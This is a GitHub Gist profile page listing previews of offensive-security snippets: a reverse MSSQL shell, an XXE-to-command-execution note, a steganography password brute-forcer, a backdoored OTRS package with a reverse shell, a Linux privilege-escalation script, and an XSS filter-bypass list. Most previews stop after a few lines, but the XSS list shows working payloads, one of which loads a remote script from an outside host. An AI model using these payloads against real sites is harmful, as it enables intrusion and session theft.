Skip to content

Instantly share code, notes, and snippets.

Avatar
🏠
Working from home

ReK2 r3k2

🏠
Working from home
View GitHub Profile
View NeoMutt colorschemes
# for background in 16 color terminal, valid background colors include:
# base03, bg, black, any of the non brights
# style notes:
# when bg=235, that's a highlighted message
# normal bg=233
# basic colors ---------------------------------------------------------
# color normal brightyellow default
color error color196 color235 # message line error text
@r3k2
r3k2 / mandros.py
Created Jun 5, 2018 — forked from xassiz/mandros.py
Reverse MSSQL shell
View mandros.py
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''
@r3k2
r3k2 / SuperGoBuster.sh
Last active Jun 9, 2018
SuperGoBuster
View SuperGoBuster.sh
#!/bin/bash
set -eu
URL=$1
SECLIST="${HOME}/herramientas/diccionarios/SecLists/Discovery/Web_Content"
MIDDIR="/usr/share/dirbuster/directory-list-2.3-medium.txt"
declare -a FILES=("tomcat.txt" "nginx.txt" "apache.txt" "Top1000-RobotsDisallowed.txt" "ApacheTomcat.fuzz.txt" "sharepoint.txt" "iis.txt")
EXTENSIONS=("txt,php,doc,docx")
GOB="/bin/gobuster"
OUTPUT="${URL}-results"
View gist:1f6f4afc2de1006de4e56e6e9a7d4b20
This turns https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt
into a Remote Command Execution:
NOTE: It relies on the PHP expect module being loaded
(see http://de.php.net/manual/en/book.expect.php)
joern@vbox-1:/tmp$ cat /var/www/server.php
<?
require_once("/usr/share/php/libzend-framework-php/Zend/Loader/Autoloader.php");
Zend_Loader_Autoloader::getInstance();
View keybase.md

Keybase proof

I hereby claim:

  • I am rek2fernandez on github.
  • I am cfernandez (https://keybase.io/cfernandez) on keybase.
  • I have a public key ASDB2t5UcZyFOJ7JllgzK85TEJfktBx0ibpsCrPs6aacGQo

To claim this, I am signing this object:

@r3k2
r3k2 / StegBrute.rb
Last active Nov 22, 2017
Brute force steganography passwords
View StegBrute.rb
#!/bin/env ruby
# Hispgatos
# by ReK2, Fernandez Chris
# https://keybase.io/cfernandez
# Bruteforce password protected documents hidden inside images
# add you dictionary below to the dic variable
# of course you need to have installed steghide
require 'open3'
@r3k2
r3k2 / xxsfilterbypass.lst
Last active Nov 15, 2017 — forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
View xxsfilterbypass.lst
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
View how-to-oscp-final.md

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

@r3k2
r3k2 / MyPackage.opm
Created Sep 27, 2017 — forked from mgeeky/MyPackage.opm
OTRS OPM backdoored Package with Reverse Shell
View MyPackage.opm
<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
<Name>MyModule</Name>
<Version>1.0.0</Version>
<Vendor>My Module</Vendor>
<URL>http://otrs.org/</URL>
<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>
<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>
<Description Lang="en">MyModule</Description>
<Framework>5.x.x</Framework>
@r3k2
r3k2 / LinuxPrivEsc.sh
Created Aug 24, 2017 — forked from 1N3/LinuxPrivEsc.sh
Linux Privilege Escalation Script by 1N3 @CrowdShield - https://crowdshield.com
View LinuxPrivEsc.sh
#!/bin/sh
#
# `7MN. `7MF'
# __, MMN. M
#`7MM M YMb M pd""b.
# MM M `MN. M (O) `8b
# MM M `MM.M ,89
# MM M YMM ""Yb.
#.JMML..JML. YM 88
# (O) .M'